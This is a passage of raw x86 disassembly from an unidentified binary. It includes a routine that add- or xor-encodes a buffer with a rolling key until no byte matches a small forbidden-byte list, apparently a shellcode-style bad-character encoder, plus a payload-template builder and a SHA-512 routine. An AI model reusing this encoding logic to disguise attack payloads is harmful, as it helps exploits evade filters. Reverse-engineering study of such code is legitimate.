mov [ebp+var_8], esi
jns short loc_41414E
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_41414E: ; CODE XREF: sub_41411F+28�j
jz short loc_414154
mov [ebp+var_1], 1
loc_414154: ; CODE XREF: sub_41411F:loc_41414E�j
mov eax, 172h
cmp esi, eax
jle short loc_414167
cmp [ebp+var_1], 1
jnz loc_414324
loc_414167: ; CODE XREF: sub_41411F+3C�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_414181
cmp [ebp+var_1], 1
jnz short loc_414181
jmp loc_414324
; ---------------------------------------------------------------------------
loc_41417C: ; CODE XREF: sub_41411F+ED�j
mov eax, 172h
loc_414181: ; CODE XREF: sub_41411F+50�j
; sub_41411F+56�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_424894
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4141C8
loc_4141B0: ; CODE XREF: sub_41411F+A7�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
add al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4141B0
loc_4141C8: ; CODE XREF: sub_41411F+8F�j
cmp [ebp+var_1], 1
jnz short loc_4141D5
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4141D5: ; CODE XREF: sub_41411F+AD�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle short loc_414217
loc_4141DE: ; CODE XREF: sub_41411F+E2�j
mov dl, [edi+ebx]
xor esi, esi
loc_4141E3: ; CODE XREF: sub_41411F+D0�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_4141F3
inc esi
cmp esi, 8
jl short loc_4141E3
jmp short loc_4141F7
; ---------------------------------------------------------------------------
loc_4141F3: ; CODE XREF: sub_41411F+CA�j
mov byte ptr [ebp+arg_0+3], 0
loc_4141F7: ; CODE XREF: sub_41411F+D2�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414203
inc edi
cmp edi, [ebp+var_8]
jl short loc_4141DE
loc_414203: ; CODE XREF: sub_41411F+DC�j
cmp byte ptr [ebp+arg_0+3], 1
jz short loc_414217
cmp cl, 0FFh
jb loc_41417C
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414217: ; CODE XREF: sub_41411F+BD�j
; sub_41411F+E8�j ...
cmp [ebp+var_1], 1
jnz short loc_414226
mov eax, [ebp+var_C]
inc [ebp+arg_8]
mov [ebp+var_8], eax
loc_414226: ; CODE XREF: sub_41411F+FC�j
mov eax, [ebp+arg_8]
cdq
sub eax, edx
sar eax, 1
mov [ebx+3], al
mov eax, [ebp+var_8]
jmp loc_414326
; ---------------------------------------------------------------------------
loc_414239: ; CODE XREF: sub_41411F+14�j
cmp [ebp+arg_0], 2
jnz loc_414324
mov eax, [ebp+arg_8]
lea esi, [eax+18h]
and eax, 80000001h
mov [ebp+var_8], esi
jns short loc_414258
dec eax
or eax, 0FFFFFFFEh
inc eax
loc_414258: ; CODE XREF: sub_41411F+132�j
jz short loc_41425E
mov [ebp+var_1], 1
loc_41425E: ; CODE XREF: sub_41411F:loc_414258�j
mov eax, 172h
cmp esi, eax
jle short loc_414271
cmp [ebp+var_1], 1
jnz loc_414324
loc_414271: ; CODE XREF: sub_41411F+146�j
lea ecx, [esi+1]
cmp ecx, eax
mov [ebp+var_C], ecx
jle short loc_41428B
cmp [ebp+var_1], 1
jnz short loc_41428B
jmp loc_414324
; ---------------------------------------------------------------------------
loc_414286: ; CODE XREF: sub_41411F+1FF�j
mov eax, 172h
loc_41428B: ; CODE XREF: sub_41411F+15A�j
; sub_41411F+160�j
inc [ebp+var_2]
and [ebp+arg_0], 0
push eax
push 0
push ebx
call sub_407B70
add esp, 0Ch
push 6
pop ecx
mov esi, offset dword_4248B0
mov edi, ebx
rep movsd
mov cl, [ebp+var_2]
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebx+0Eh], cl
mov [ebx+12h], cl
jle short loc_4142D2
loc_4142BA: ; CODE XREF: sub_41411F+1B1�j
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
mov al, [esi+eax]
xor al, cl
mov [ebx+esi+18h], al
inc esi
cmp esi, [ebp+arg_8]
mov [ebp+arg_0], esi
jl short loc_4142BA
loc_4142D2: ; CODE XREF: sub_41411F+199�j
cmp [ebp+var_1], 1
jnz short loc_4142DF
mov eax, [ebp+arg_0]
mov [eax+ebx+18h], cl
loc_4142DF: ; CODE XREF: sub_41411F+1B7�j
cmp [ebp+var_8], edi
mov byte ptr [ebp+arg_0+3], 1
jle loc_414217
loc_4142EC: ; CODE XREF: sub_41411F+1F0�j
mov dl, [edi+ebx]
xor esi, esi
loc_4142F1: ; CODE XREF: sub_41411F+1DE�j
mov eax, [ebp+arg_C]
cmp dl, [esi+eax]
jz short loc_414301
inc esi
cmp esi, 8
jl short loc_4142F1
jmp short loc_414305
; ---------------------------------------------------------------------------
loc_414301: ; CODE XREF: sub_41411F+1D8�j
mov byte ptr [ebp+arg_0+3], 0
loc_414305: ; CODE XREF: sub_41411F+1E0�j
cmp byte ptr [ebp+arg_0+3], 0
jz short loc_414311
inc edi
cmp edi, [ebp+var_8]
jl short loc_4142EC
loc_414311: ; CODE XREF: sub_41411F+1EA�j
cmp byte ptr [ebp+arg_0+3], 1
jz loc_414217
cmp cl, 0FFh
jb loc_414286
loc_414324: ; CODE XREF: sub_41411F+42�j
; sub_41411F+58�j ...
xor eax, eax
loc_414326: ; CODE XREF: sub_41411F+115�j
pop edi
pop esi
leave
retn
sub_41411F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41432A proc near ; CODE XREF: sub_41A5C1+19F�p
; sub_41A9DE+490�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
lea edx, [eax+1]
loc_414333: ; CODE XREF: sub_41432A+E�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_414333
sub eax, edx
push ebx
lea ebx, [eax+0CCh]
cmp ebx, 172h
jg short loc_414393
push esi
push edi
mov edi, [ebp+arg_0]
push ebx
push 0
push edi
call sub_407B70
mov eax, [ebp+arg_4]
add esp, 0Ch
push 32h
pop ecx
mov esi, offset dword_4248D0
rep movsd
movsw
movsb
lea esi, [eax+1]
loc_41436F: ; CODE XREF: sub_41432A+4A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41436F
sub eax, esi
push eax
mov eax, [ebp+arg_0]
push [ebp+arg_4]
add eax, 0CAh
push eax
call sub_407BF0
add esp, 0Ch
pop edi
mov eax, ebx
pop esi
jmp short loc_414395
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_41432A+1F�j
xor eax, eax
loc_414395: ; CODE XREF: sub_41432A+67�j
pop ebx
pop ebp
retn
sub_41432A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143A0 proc near ; CODE XREF: sub_41B7F9+64�p
xor ecx, ecx
push esi
push edi
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax], ecx
mov [eax+4], ecx
lea edi, [eax+10h]
mov ecx, 10h
mov esi, offset dword_41FE50
rep movsd
pop edi
pop esi
retn
sub_4143A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4143D0 proc near ; CODE XREF: sub_416AE0+BE�p
; sub_416AE0+13B�p ...
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_41456E
; ---------------------------------------------------------------------------
align 10h
loc_414560: ; CODE XREF: sub_4143D0+2680�j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_41456E: ; CODE XREF: sub_4143D0+18A�j
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414658
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_41466E
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143D0+1A8�j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_41466E: ; CODE XREF: sub_4143D0+286�j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F950[eax*8]
adc edi, ds:dword_41F954[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_414884
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_414893
; ---------------------------------------------------------------------------
loc_414884: ; CODE XREF: sub_4143D0+3D5�j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_414893: ; CODE XREF: sub_4143D0+4B2�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F958[eax*8]
adc esi, ds:dword_41F95C[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_414AAE
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_414ABD
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4143D0+605�j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_414ABD: ; CODE XREF: sub_4143D0+6DC�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F960[eax*8]
adc esi, ds:dword_41F964[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_414CEA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_414CFF
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_4143D0+82F�j
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_414CFF: ; CODE XREF: sub_4143D0+918�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F968[eax*8]
adc esi, ds:dword_41F96C[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
